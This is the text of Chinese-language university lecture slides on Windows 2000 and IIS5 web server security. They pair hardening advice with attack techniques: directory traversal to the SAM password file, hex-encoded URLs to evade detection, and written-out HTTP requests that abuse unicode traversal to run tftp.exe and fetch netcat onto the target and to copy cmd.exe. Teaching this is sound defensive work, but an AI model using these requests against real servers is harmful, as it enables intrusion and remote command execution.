Windows2000系统安全-中国安全网.ppt

Win2k系统安全(2) 胡建斌 北京大学网络与信息安全研究室 E-mail: hjbin@ /~hjbin IIS5的安全 IIS5基础－基本HTTP HTTP：基于文本的无状态文件传输协议 /files/index.html 虚拟目录：files 映射到该系统磁盘的一个实际目录上，如c:\inetpub\wwwroot\files\ 对于服务器而言则形成如下的请求： GET /files/index.html HTTP/1.0 若该文件存在，则服务器会向客户端推送该文件并在客户端的浏览器上显示；否则会有各种错误代码 IIS5基础－CGI CGI：Common Gateway Interface，运行在服务器上的应用程序，能针对每个请求生成动态的内容，扩展了Web功能 调用CGI /scripts/cgi.exe?var1+var2 Windows中几乎所有的可执行程序都可以作为服务器端的CGI应用程序来执行 其中cmd.exe经常被作为寻找的目标 IIS5基础－ASP和ISAPI ASP：Active Server Pages ISAPI: Interface Server Application Programming Interface 调用ASP /scripts/script.asp?var1=xvar2=y 调用ISAPI /isapi.dll? var1var2 HTTP攻击伎俩 使用../进行文件系统遍历 URL的十六进制编码 使用 ../ 进行文件系统遍历 /../../../../winnt/secret.txt 通常是在目录上设置不当的NTFS访问控制列表所导致的 /../../../../winnt/repair/sam URL的十六进制编码 Http允许URL中使用十六进制编码形式输入字符串 利用URL的十六进制编码攻击 /../../winnt/repair/sam ％2F ％2E ％2E ％2F ％2E ％2E ％2F winnt/repair/sam 能避免入侵检测系统的检测，或可以导致应用程序错误处理输入 IIS5缓冲区溢出 IPP缓冲区溢出 索引服务ISAPI扩展缓冲区溢出 Code Red蠕虫 ida/idq缓冲区溢出 FrontPage 2000服务器扩展缓冲区溢出 安全对策 在系统驱动器之外的驱动器上安装Web文件夹 Web服务器所在的卷应使用NTFS并谨慎设置ACL 移动、删除或改名可能被利用的可执行文件：cacls,xcacls 在服务器的Write和Execute ACL中删除Everyone和Users Group 掌握对日志中攻击标志的分析 将文件写入Web服务器 如在目标机上建立tftp服务器，然后上载文件： GET /scripts/..%c0%af../winnt/system32/tftp.exe? “-i”+1+GET+nc.exe c:\nc.exe HTTP/1.0 将netcat写入到C:\，因为默认情况下所有用户对C:\具有写权限 如将目标机器上cmd.exe改名为cmdl.exe GET /scripts/..%c0%af../winnt/system32/cmd.exe?+copy+ c:\winnt\system32\cmd.exe+c:\cmdl.exe HTTP/1.0 其它自动上载工具：如unicodeloader等 通过IIS5提升权限 通过InProcesslsapiApps利用RevertToSelf 安装MS01-026补丁可以解决 源代码泄漏攻击 起因 IIS中的程序缺陷 低劣的Web编程技术 常见的漏洞 +.htr(ism.dll) Webhits(webhits.dll) Translate: f (WebDAV, httpext.dll) WebDAV目录列表（httpext.dll) Web服务器安全评估工具 Stealth HTTP Scanner SSLProxy http://www.obdev.at/Products Achilles /projects.html Wfetch /support/kb/articles/Q284/2/85.sap Whisker Web服务器安全忠告 在路由器、防火墙或其它位于Web服务器周边位置的设备上应用网路级的访问控制 在主机级，阻塞Web服务器上所有不必要的流入和流出连接 随时安装热修复：/technet/security 删除不必要的脚本映射和不使用的ISAPI应用程序DLL 禁用不必要的服务 在应用Web服务之前，强烈推荐使用Security Templ